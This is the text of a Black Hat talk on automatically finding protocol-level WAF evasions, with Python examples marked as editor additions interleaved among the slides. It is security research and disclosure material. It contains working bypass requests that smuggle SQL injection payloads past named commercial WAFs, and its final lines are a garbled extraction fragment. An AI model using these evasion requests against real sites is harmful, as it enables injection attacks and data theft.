Qi Wang, Jianjun Chen, Run Guo, Chao Zhang, Haixin Duan: "Break the Wall from Bottom: Automated Discovery of Protocol-Level Evasion Vulnerabilities in Web Application Firewalls" (Black Hat USA slide deck, 50 pages).
[Slide 1] Break the Wall from Bottom: Automated Discovery of Protocol-Level Evasion Vulnerabilities in Web Application Firewalls
#BHUSA BlackHatEvents
Speaker: Qi Wang (Eki)
Contributors: Jianjun Chen, Run Guo, Chao Zhang, Haixin Duan

[Slide 2] Talk Roadmap
- What are WAFs and how do they work?
- How do we discover new evasion cases automatically?
- How to bypass a WAF at the protocol level like a pro?
- Bonus: three useful tactics to bypass WAFs at the protocol level

[Slide 3] WebApp Security Risk
- A WebApp uses parameters in HTTP request messages as user inputs.
- Malicious user inputs can hijack the control flow of the WebApp.
(Figure: a code snippet from a PHP WebApp with a SQL injection vulnerability, attacked with `?id=0 union select * from secret`)

[Slide 4] How Does a WAF Protect the WebApp from Security Risk?
- WAFs monitor WebApp traffic to block malicious HTTP requests.
- Virtual patch: protect the WebApp before the developers release the patch.
(Figure: User and Attacker both send requests through the WAF to the WebApp; the attacker's `?id=0 union select * from secret` is blocked at the WAF)

[Slide 5] The Never-Ending Battle Between Hackers and WAFs
- Cloudflare research* shows lots of activity since Log4Shell.
- Hackers have been looking for ways to bypass the WAF.
- After `${jndi` got blocked, the hackers applied encoding methods and log4j features.
* https:/ (Cloudflare blog link, truncated)

[Slide 6] The Working Principle of WAFs: Parse, Match, Apply
(Figure: the attacker sends
    GET / HTTP/1.1
    Content-Type: application/json

    {"id": "1'or(1=1)#"}
WAF parsing yields ARGS with Key: id, Value: 1'or(1=1)#. The matching rule is Variable: ARGS, Operator: contains "or(1=1)#", Action: deny. The request is denied and is not sent to the server.)
[Slide 7] Wait a Minute? Looks Like a Weak Rule!
- Just change the case of the keywords and use `<>` instead of `=`.
- Now you have found payload-level evasion tactics.
(Figure: the same request with body `{"id": "1'Or(1<>0)#"}`. WAF parsing yields Key: id, Value: 1'Or(1<>0)#; the rule "ARGS contains or(1=1)#" does not match, the SQLi request is forwarded, and the WebApp responds with leaked data.)

[Slide 8] What If the Rules Become Insane?
- Vendors can configure their rules to allow only numeric values.
(Figure: the same request with `{"id": "1'Or(1<>0)#"}`. WAF parsing yields Key: id, Value: 1'Or(1<>0)#; the rule "ARGS contains a non-digit ([^0-9]) → deny" fires and the request is not forwarded to the server.)
[Slide 9] Now the Magic Time!
- Just change the Content-Type to application/x-whatever+json.
(Figure:
    GET / HTTP/1.1
    Content-Type: application/x-whatever+json

    {"id": "1'or(1=1)#"}
WAF parsing yields ARGS Key: None, Value: None, so the rule "ARGS contains [^0-9] → deny" never fires and the request is forwarded. The WebApp parses ARGS Key: id, Value: 1'or(1=1)# and responds with leaked data.)
[Slide 10] Now the Magic Time!
- Just change the Content-Type to application/x-whatever+json.
- The WAF does not recognize x-whatever+json as a JSON body.
- The WebApp matches application/*+json and still parses it as JSON.

[Slide 11] Different Parsers Allow Protocol-Level Evasion
- Built-in parsers: their behavior may differ from each other.
- Developers get parameters through higher-level interfaces like $_GET.
- However, the WAF knows nothing about these interfaces.
(Figure: the WAF and WebApps A, B and C each parse the same request differently: "Hey bros, I think the parameter is W" / "Really? I think it is X" / "No, it is definitely Y" / "Aren't there two parameters?")

[Slide 12] Payload-Level vs Protocol-Level
- Payload level: craft a payload that is not in the WAF's rules.
  - Limited to one specific vulnerability type: SQLi, XSS, ...
  - Quickly fixed by updating the rules.
  - Related work: AutoSpear (Black Hat Asia 22), a mutation-guided SQLi payload generator using a Monte Carlo algorithm; WAF-A-MoLE (SAC 20), which generates SQLi payloads through adversarial machine learning.

[Slide 13] Payload-Level vs Protocol-Level
- Payload level: craft a payload that is not in the WAF's rules (limited to one vulnerability type, quickly fixed by updating rules).
- Protocol level: leverage the different parsing behavior of the WAF and the WebApp.
  - Can be used to deliver arbitrary attack vectors, including SQLi, XSS, ...
  - Works well even if the WAF has strict rules at the payload level.
  - Related work: Protocol-Level Evasion of Web Application Firewalls (Black Hat USA 12); there are still many new cases.
  - This is our focus.

[Slide 14] There Are So Many "Parameters" in HTTP
- WebApps consume parameters from many places in the HTTP request message:
  - Path parameters: /users/{id}
  - Query parameters: ?role=admin&id=1
  - Header parameters: X-MyHeader: Value
  - Cookie parameters: Cookie: debug=0; session=aaa;
  - Body parameters: x-www-form-urlencoded (a=1&b=2), JSON ({"a": "1"}), multipart/form-data, XML
- Reference: https://swagger.io/docs/specification/describing-parameters/
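The parser-selection differential of slides 9 and 10, as an added Python example (not code from the talk or from WAFManis). `waf_treats_as_json` is the exact-match behaviour the slides attribute to the bypassed WAF, `app_treats_as_json` is the `application/*+json` suffix rule that Flask's `request.is_json` applies, and the numeric-only check is the "insane" rule from slide 8. The list of Content-Type values and the JSON body are constructed here; the function names are mine.

```python
import json
import re


def mimetype(content_type):
    """Media type without its parameters, lower-cased."""
    return content_type.split(";", 1)[0].strip().lower()


def waf_treats_as_json(content_type):
    """Exact-match rule: only application/json reaches the JSON parser (the bypassed WAF's behaviour)."""
    return mimetype(content_type) == "application/json"


def app_treats_as_json(content_type):
    """Structured-suffix rule, as Flask/Werkzeug's request.is_json does:
    application/json or any application/*+json subtype is parsed as JSON."""
    mt = mimetype(content_type)
    return mt == "application/json" or (mt.startswith("application/") and mt.endswith("+json"))


def extract_args(content_type, body, treats_as_json):
    """ARGS as seen by a side that uses `treats_as_json` to pick its parser."""
    if not treats_as_json(content_type):
        return {}
    try:
        doc = json.loads(body)
    except ValueError:
        return {}
    return {k: str(v) for k, v in doc.items()} if isinstance(doc, dict) else {}


def waf_decision(content_type, body, treats_as_json=waf_treats_as_json):
    """Slide 8's strict rule: every ARGS value must be purely numeric, otherwise deny."""
    args = extract_args(content_type, body, treats_as_json)
    return "deny" if any(re.fullmatch(r"[0-9]+", v) is None for v in args.values()) else "forward"


def is_evasion(content_type, body):
    """Protocol-level evasion: the WAF forwards a request that its own rule would
    have denied had it chosen the parser the way the application does."""
    return (waf_decision(content_type, body) == "forward"
            and waf_decision(content_type, body, app_treats_as_json) == "deny")


# Constructed inputs: the body from slide 9 plus a few Content-Type variants.
BODY = '{"id": "1\'or(1=1)#"}'
CASES = [
    "application/json",
    "application/json; charset=utf-8",
    "application/x-whatever+json",
    "APPLICATION/vnd.api+JSON; charset=utf-8",
    "text/json",
]


def find_evasions(cases=CASES, body=BODY):
    """Content-Type values for which the WAF forwards but the app would parse the payload."""
    return [ct for ct in cases if is_evasion(ct, body)]


if __name__ == "__main__":
    for ct in CASES:
        print(f"{ct:42} waf={waf_decision(ct, BODY):8} app_args={extract_args(ct, BODY, app_treats_as_json)}")
    print("evasions:", find_evasions())
    # Hardened WAF: select the parser with the backend's rule instead of exact matching.
    print("hardened:", waf_decision("application/x-whatever+json", BODY, app_treats_as_json))
```

`text/json` is not an evasion because neither side parses it: the differential matters only where the application's parser is broader than the WAF's. The fix shown in the last line is to make the WAF's parser-selection rule at least as permissive as the backend's, which is the point slide 10 makes.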
[Slide 15] How to systematically and efficiently mine for protocol-level evasion cases in WAFs?

[Slide 16] WAFManis: An Evasion Fuzzing Framework
- Grammar guided and code-coverage driven.
- https:/ (tool link, truncated)

[Slide 17] Demo Video

[Slide 19] Challenges We Addressed
[Slide 20] How to Generate High-Quality Test Inputs?
- Legacy fuzzer: put raw HTTP requests in the corpus and mutate raw bytes.
- Most of the resulting test inputs are invalid or missing the payload.
(Figure: the seed
    GET / HTTP/1.1
    Content-Type: application/json

    {"id": "1'Or(1<>0)#"}
is mutated into broken requests such as `GT / HTTP/1.1`, `Conten:POST`, a body whose payload is damaged to `{"id": "1'r(1<>0)#"}`, and a body cut off at `{"id": "`.)

[Slide 21] WAFManis: Generator
- Generate initial inputs with an HTTP grammar.
- Extract the grammar from the RFCs (RFC 7230, RFC 7578, RFC 2231).
- Build the request from the root node.
- Dump the corresponding HTTP request when executing.
(Figure: the grammar tree body → dash-boundary, body-part (MIME-headers, body-value), closing-boundary, rendered as
    --boundary
    Content-Disposition: form-data; name="id";

    1 union select password from users limit 1
    --boundary--
)

[Slide 22] WAFManis: Mutator
- Directed mutation:
  - Grammar level: duplicate or delete non-leaf nodes.
  - Byte level: delete or add a single byte in leaf nodes, or encode leaf nodes.
  - Specifically, never delete or add bytes in the payload.
(Figure: the body-part node is duplicated, so the rendered body contains the `Content-Disposition: form-data; name="id"` part with the `1 union select password from users limit 1` payload twice before the closing boundary.)

[Slide 23] How to Get Effective Feedback?
- Black-box fuzzer: generates test inputs blindly, which is inefficient.
- Grey-box fuzzer: guides the fuzzing process with code-coverage feedback from the target, e.g. AFL.
- However, commercial WAFs are closed source, with neither code nor binary available.

[Slide 24] How to Get Effective Feedback?
- Use the code coverage of open-source HTTP parsers to guide testing.
- Both parsers are implemented to parse HTTP requests with similar logic.
- The more feature branches we cover, the more differences we find.

[Slide 25] How to Detect Successful Evasion Automatically?
- Legacy fuzzers rely on program exceptions, such as crashes or hangs.
- Protocol-level WAF evasions are silent and do not trigger crashes.
- The request is benign on the WAF side while harmful on the WebApp side.
- The WAF may modify the original request message.

[Slide 26] WAFManis: Validator
- Web Validator: returns all parsed parameters, which shows how the WebApp parses HTTP requests; it is the test target in the fuzzing process.
(Flask validator from the slide, with the imports and application object it needs; `APP_S` is the status constant the slide references, its value is not shown and 200 is assumed here)

    import flask
    from json import dumps

    app = flask.Flask(__name__)
    APP_S = 200  # response status used by the validator; name from the slide, value assumed

    @app.route("/", methods=["GET", "POST"])
    def parse1():
        # Echo back every parameter the framework extracted, so the fuzzer can
        # compare the WebApp's view of the request with the WAF's view.
        return (dumps({"args": flask.request.args,
                       "form": flask.request.form,
                       "json": flask.request.json if flask.request.is_json else None}),
                APP_S,
                {"Content-Type": "application/json"})

[Slide 27] WAFManis: Validator
- WAF Validator: returns SWAF_PASS together with the exact HTTP request.
  - Quickly know which request passed.
  - Get the exact forwarded request to learn how the WAF modified it.

[Slide 28] WAFManis: Validator
- 2-step validation: WAFs may modify the original request, so the WAF Validator saves the request samples and sends them to the WebApp for a second validation.

[Slide 29] Too Many Duplicate Cases :-(
- There are too many "optional" fields in the HTTP message.
- Many successful evasion cases look different but are the same, e.g. the same `{"id": "1'Or(1<>0)#"}` body sent with `Content-Type: application/x-ajson`, `application/x-ajson; c=1`, `application/x-ajson; a=2` and `application/x-ajson;`.

[Slide 30] WAFManis: Centrifuge
- Minimize and re-verify the evasion:
  - Remove useless nodes iteratively.
  - Avoid redundant mutation and help find unique samples.
  - 2-step verification to exclude false-positive samples.
(Figure: 1. delete a node → WAF Validator → 2. bypassed → Centrifuge → 3. replay the real request → WebApp Validator → 4. parsed correctly.)

[Slide 31] Talk is cheap. Look at what we found!
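The generate / mutate / validate / minimize loop of slides 21 to 30, as an added, self-contained Python model. This is not the WAFManis code: the node names follow the slide's grammar tree, but the tree shape, the byte-level insertion alphabet, and the in-process oracle are my assumptions. The two "validators" are stand-ins for the real WAF and WebApp deployments: a strict multipart extractor that keeps the quotes around a boundary value and a lenient one that strips them, which is the Case 3 split shown later in the talk. `centrifuge` performs the node-deletion minimization of slide 30 and re-checks the oracle after every deletion.

```python
import copy
import random
import re


class Node:
    """Grammar node: non-leaf nodes hold children, leaf nodes hold bytes.
    payload=True marks the attack string, which the mutator never touches."""

    def __init__(self, name, children=None, data=b"", payload=False):
        self.name, self.children, self.data, self.payload = name, list(children or []), data, payload

    def render(self):
        return self.data if not self.children else b"".join(c.render() for c in self.children)


def seed_request(payload=b"1'or(1=1)#"):
    """Root-first construction of a multipart/form-data POST along the RFC 7578 body grammar."""
    crlf = lambda: Node("CRLF", data=b"\r\n")
    part = Node("body-part", [
        Node("dash-boundary", data=b"--a\r\n"),
        Node("MIME-headers", [Node("disposition", data=b'Content-Disposition: form-data; name="id"\r\n'), crlf()]),
        Node("body-value", data=payload, payload=True),
        crlf()])
    return Node("request", [
        Node("request-line", data=b"POST / HTTP/1.1\r\n"),
        Node("content-type", [Node("ct-value", data=b"Content-Type: multipart/form-data; boundary="),
                              Node("ct-boundary", data=b"a"), crlf()]),
        crlf(),
        Node("body", [part, Node("closing-boundary", data=b"--a--\r\n")])])


def walk(node):
    """Yield (parent, index, child) for every edge of the tree."""
    for i, child in enumerate(node.children):
        yield node, i, child
        yield from walk(child)


def mutate(tree, rng):
    """One directed mutation: grammar level on a non-leaf node, byte level on a non-payload leaf."""
    t = copy.deepcopy(tree)
    edges = list(walk(t))
    non_leaf = [e for e in edges if e[2].children]
    leaves = [e[2] for e in edges if not e[2].children and not e[2].payload]
    if non_leaf and rng.random() < 0.5:
        parent, i, child = rng.choice(non_leaf)
        if rng.random() < 0.5:
            parent.children.insert(i + 1, copy.deepcopy(child))  # duplicate the subtree
        else:
            del parent.children[i]                               # delete the subtree
    elif leaves:
        leaf = rng.choice(leaves)
        pos = rng.randrange(len(leaf.data) + 1)
        if leaf.data and rng.random() < 0.5:
            leaf.data = leaf.data[:pos] + leaf.data[pos + 1:]    # delete one byte
        else:                                                    # add one byte (assumed alphabet)
            leaf.data = leaf.data[:pos] + rng.choice([b'"', b";", b" "]) + leaf.data[pos:]
    return t


def parse_args(raw, strip_boundary_quotes):
    """Minimal multipart parameter extractor standing in for the WAF / WebApp validators.
    The two sides differ only in whether a quoted boundary value is unquoted."""
    head, _, body = raw.partition(b"\r\n\r\n")
    m = re.search(rb"boundary=([^;\r\n]*)", head)
    if not m:
        return {}
    boundary = m.group(1).strip()
    if strip_boundary_quotes:
        boundary = boundary.strip(b'"')
    args = {}
    for part in body.split(b"--" + boundary)[1:]:
        pm = re.match(rb'\r\nContent-Disposition: form-data; name="([^"]*)"\r\n\r\n(.*?)\r\n', part, re.S)
        if pm:
            args[pm.group(1)] = pm.group(2)
    return args


def is_evasion(raw, payload=b"1'or(1=1)#"):
    """2-step oracle: benign on the WAF side (payload not in ARGS), harmful on the WebApp side."""
    return payload not in parse_args(raw, False).values() and payload in parse_args(raw, True).values()


def fuzz(rounds=2000, seed=1):
    """Generator + mutator + validator loop; returns the first evading tree, or None."""
    rng = random.Random(seed)
    base = seed_request()
    for _ in range(rounds):
        candidate = mutate(base, rng)
        if is_evasion(candidate.render()):
            return candidate
    return None


def centrifuge(tree):
    """Delete any single non-payload node whose removal keeps the evasion, until a fixed point."""
    t = copy.deepcopy(tree)
    changed = True
    while changed:
        changed = False
        for parent, i, child in list(walk(t)):
            if child.payload:
                continue
            del parent.children[i]
            if is_evasion(t.render()):
                changed = True
                break
            parent.children.insert(i, child)   # deletion broke the evasion, put it back
    return t
```

Running `fuzz()` and then `centrifuge()` on the result reproduces the slide 30 flow: the minimized tree keeps only the nodes the evasion actually depends on (the Content-Type line with the quoted boundary and the one body part), which is what makes two mutants that differ only in optional fields collapse into one unique sample.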
[Slide 32] Evaluation Setup
- WebApp frameworks: the top 20 popular open-source WebApp frameworks.
- WAFs: 8 commercial WAFs, selected by a global market-share report; 6 open-source WAFs, selected by the "WAF" topic on GitHub.

[Slide 33] What Did We Find?
- All tested web frameworks accept some non-regular requests.
- Most WAFs can be easily bypassed with specific HTTP requests.
(Results table not preserved in the extracted text. Footnote 1: the affected web framework indicates the influence of all bypass cases for the corresponding WAF.)

[Slide 34] Tactics-1: Parameter Type Confusion
First of all, the WAF needs to choose the correct parser.

[Slide 35] Tactics-1: Parameter Type Confusion
- Case 1: multiple Content-Type headers. Flask uses the last Content-Type header to decide the body type; ModSecurity resolves the first one.
(Figure:
    POST / HTTP/1.1
    Content-Type: application/xml
    Content-Type: application/x-www-form-urlencoded
Nginx and ModSecurity treat the body as XML and extract ARGS Key: None, Value: None. The Flask app treats it as URL-encoded parameters, extracts Key: id, Value: 1'or(1=1)#, and responds with leaked data.)

[Slide 36] Tactics-1: Parameter Type Confusion
- Case 1: Flask (Python) stores HTTP headers in a dictionary, so a repeated header name keeps the last value.

[Slide 37] Tactics-1: Parameter Type Confusion
- Case 2: fake file parameter. The WAF does not apply SQLi rules to file parameters.
- The WAF parser thinks the part is a file because it sees only one header and that header carries a filename parameter, while PHP parses it as a normal parameter.
(Figure, PHP-based app:
    --a
    Content-Disposition: form-data; name=id;\r\rContent-Transfer-Encoding: filename=1'or(1=1)#

    --a
Alibaba Cloud WAF: it is a file, File: filename: "", Content: 1'or(1=1)#. PHP: it is a parameter, ARGS Key: id, Value: 1'or(1=1)#; the app responds with leaked data.)

[Slide 38] Tactics-2: Malformed Parameter
Where WAFs fail, WebApps succeed.

[Slide 39] Tactics-2: Malformed Parameter
- Case 3: malformed boundary parameter. The attacker crafted a boundary parameter with quotes; Cloudflare WAF could not parse it correctly.
(Figure:
    Content-Type: multipart/form-data; boundary="a";

    --a
    Content-Disposition: form-data; name="id";

    1'or(1=1)#
    --a
Cloudflare WAF keeps the quotes, so the boundary is `"a"` and ARGS Key: None, Value: None. The WebApp removes the quotes, so the boundary is `a` and ARGS Key: id, Value: 1'or(1=1)#; it responds with leaked data.)

[Slide 40] Tactics-2: Malformed Parameter
- Case 4: malformed boundary separator. The attacker crafted an incomplete closing boundary separator; Fortinet WAF could not parse it correctly, while PHP tolerated the incomplete structure and parsed the SQLi payload.
(Figure, PHP-based WebApp:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=a;

    --a
    Content-Disposition: form-data; name="id";

    1'or(1=1)#
    --a-
Fortinet WAF: parse failure, ARGS Key: None, Value: None. PHP: tolerates it, ARGS Key: id, Value: 1'or(1=1)#; leaked data.)

[Slide 41] Tactics-2: Malformed Parameter
- Bonus: the smallest body that PHP tolerates as valid multipart. (Figure not preserved in the extracted text.)

[Slide 42] Tactics-3: RFC Support Gap
WAF is MAD? Try WebApp dialects!

[Slide 43] Tactics-3: RFC Support Gap
- Case 5: deprecated CTE header. In RFC 7578 the recommendation was deprecated and senders SHOULD NOT generate any parts with a Content-Transfer-Encoding header field. However, Go-based WebApps support it.
(Figure, Go-based app:
    --boundary
    Content-Disposition: form-data; name="id";
    Content-Transfer-Encoding: quoted-printable

    =31=27=6f=72=28=31=29=23
    --boundary
Google Cloud Armor does not decode the part: ARGS Key: id, Value: =31=27... The Go app decodes the quoted-printable value to 1'or(1)# and responds with leaked data.)
[Slide 44] Tactics-3: RFC Support Gap
- Case 5: the MIME library of the Go SDK still supports Content-Transfer-Encoding.

[Slide 45] Tactics-3: RFC Support Gap
- Case 6: charset support. According to RFC 1866, application/x-www-form-urlencoded has no "charset" parameter. Most WAFs ignore this parameter for this MIME type, but Django parses it.
(Figure, Django app:
    POST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded; charset=utf-7;

    +AGkAZA-=+ADEAJwBvAHIAKAAxACk AIw-
Azure WAF does not decode: ARGS Key: +AGkA..., Value: +ADE... Django decodes the UTF-7 body: ARGS Key: id, Value: 1'or(1)#, and responds with leaked data.)
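A request-level differential harness that reproduces Case 1, Case 5 and Case 6 from the Tactics-1 and Tactics-3 slides. This is an added example, not code from the talk or from WAFManis. The strict side models the WAF behaviours the slides describe (first Content-Type header wins, no Content-Transfer-Encoding decoding, charset ignored on form bodies); the lenient side models the framework behaviours (last header wins, quoted-printable decoded, charset honoured). The three sample requests are constructed from the slides' figures, with the Content-Disposition name quoted as RFC 7578 writes it; `fail_closed` is a hardening sketch of my own and not something the talk proposes.

```python
import quopri
import re
from urllib.parse import parse_qsl


def split_request(raw):
    """Headers as an ordered list of (name, value), duplicates preserved, plus the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = []
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return headers, body


def content_type(headers, last_wins):
    """Media type and its parameters. A list-based parser keeps the first Content-Type;
    a dict-based one (Flask, per Case 1) keeps the last."""
    values = [v for n, v in headers if n == b"content-type"]
    if not values:
        return b"", {}
    media, *params = [p.strip() for p in (values[-1] if last_wins else values[0]).split(b";")]
    parsed = {}
    for p in params:
        k, _, v = p.partition(b"=")
        if k:
            parsed[k.strip().lower()] = v.strip().strip(b'"')
    return media.lower(), parsed


def urlencoded_args(body, params, honour_charset):
    """RFC 1866 gives this type no charset; a lenient side (Django < 5.0, per Case 6) honours one anyway."""
    charset = params.get(b"charset", b"utf-8").decode("ascii", "replace") if honour_charset else "utf-8"
    try:
        text = body.decode(charset)
    except (LookupError, UnicodeDecodeError):
        return None
    return dict(parse_qsl(text, keep_blank_values=True))


def multipart_args(body, params, decode_cte):
    """RFC 7578 deprecates per-part Content-Transfer-Encoding; a lenient side (Go's MIME library, per Case 5) still decodes it."""
    boundary = params.get(b"boundary")
    if not boundary:
        return None
    args = {}
    for part in body.split(b"--" + boundary)[1:]:
        if part.startswith(b"--"):          # closing delimiter
            break
        head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if not m:
            continue
        value = value.rstrip(b"\r\n")
        if decode_cte and re.search(rb"content-transfer-encoding:\s*quoted-printable", head, re.I):
            value = quopri.decodestring(value)
        args[m.group(1).decode()] = value.decode("latin-1")
    return args


def request_args(raw, lenient):
    """ARGS as a strict (WAF-like) or lenient (framework-like) parser extracts them; None if not parsed."""
    headers, body = split_request(raw)
    media, params = content_type(headers, last_wins=lenient)
    if media == b"application/x-www-form-urlencoded":
        return urlencoded_args(body, params, honour_charset=lenient)
    if media == b"multipart/form-data":
        return multipart_args(body, params, decode_cte=lenient)
    return None


def differential(raw):
    return request_args(raw, lenient=False), request_args(raw, lenient=True)


def fail_closed(raw):
    """Hardening sketch: forward only when both parses agree; anything the strict side
    cannot decode, or decodes differently from the lenient side, is blocked."""
    strict, lenient = differential(raw)
    return "forward" if strict == lenient else "block"


# Constructed requests reproducing the slides' figures.
CASE1_TWO_CONTENT_TYPES = (b"POST / HTTP/1.1\r\nHost: app\r\n"
                           b"Content-Type: application/xml\r\n"
                           b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                           b"id=1%27or(1%3D1)%23")
CASE5_DEPRECATED_CTE = (b"POST / HTTP/1.1\r\nHost: app\r\n"
                        b"Content-Type: multipart/form-data; boundary=boundary\r\n\r\n"
                        b"--boundary\r\nContent-Disposition: form-data; name=\"id\"\r\n"
                        b"Content-Transfer-Encoding: quoted-printable\r\n\r\n"
                        b"=31=27=6f=72=28=31=29=23\r\n--boundary--\r\n")
CASE6_UTF7_CHARSET = (b"POST / HTTP/1.1\r\nHost: app\r\n"
                      b"Content-Type: application/x-www-form-urlencoded; charset=utf-7;\r\n\r\n"
                      b"+AGkAZA-=+ADEAJwBvAHIAKAAxACkAIw-")
BENIGN_FORM = b"POST / HTTP/1.1\r\nHost: app\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nid=7"

if __name__ == "__main__":
    for name, raw in [("case1", CASE1_TWO_CONTENT_TYPES), ("case5", CASE5_DEPRECATED_CTE),
                      ("case6", CASE6_UTF7_CHARSET), ("benign", BENIGN_FORM)]:
        print(name, differential(raw), fail_closed(raw))
```

All three evasions share one shape: the strict side either parses nothing (Case 1) or parses a harmless-looking token (`=31=27...`, `+ADE...`) while the lenient side recovers `1'or(1)#` from the same bytes. A WAF that mirrors the backend's decoders closes the gap; one that cannot should at least refuse to forward bodies it did not fully decode, which is what `fail_closed` does.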
[Slide 46] Tactics-3: RFC Support Gap
- Case 6: unexpected feature support in Django (fixed in version 5.0).

[Slide 47] WAFs Affected by the Three Tactics
- Found 311 evasion samples across 14 x 20 WAF and WebApp combinations. (Table not preserved in the extracted text.)

[Slide 48] Responsible Disclosure
- Responses from the affected WAF and WebApp vendors: received by 11 vendors, confirmed by 9 vendors, fixed by 8 vendors.

[Slide 49] Black Hat Sound Bytes
- Parsing parameters gives WAFs visibility, but it also creates vulnerability.
- We shared a new framework, WAFManis*: an automated coverage-guided fuzzing (CGF) tool for protocol-level WAF evasions.
- Three tactics for protocol-level WAF evasion: Parameter Type Confusion, Malformed Parameter, RFC Support Gap.
* https:/ (tool link, truncated)

[Slide 50] Thanks for listening! Any questions?
Qi Wang, Tsinghua University. Paper and tool links.
42、p VendorsFixedConfirmed11 vendors9 vendors8 vendorsReceived#BHUSA BlackHatEvents49Black Hat Sound BytesvParsing parameters give WAFs visibility but also create a vulnerabilityvWe shared a new framework:WAFManis*Automated CGF tool of protocol-level WAF evasionsvThree tactics in payload-level WAF evasionParameter Type Confusion Malformed ParameterRFC Support Gap*:https:/ BlackHatEventsThanks for listening!Any questions?Qi Wang,Tsinghua UniversityPaperTool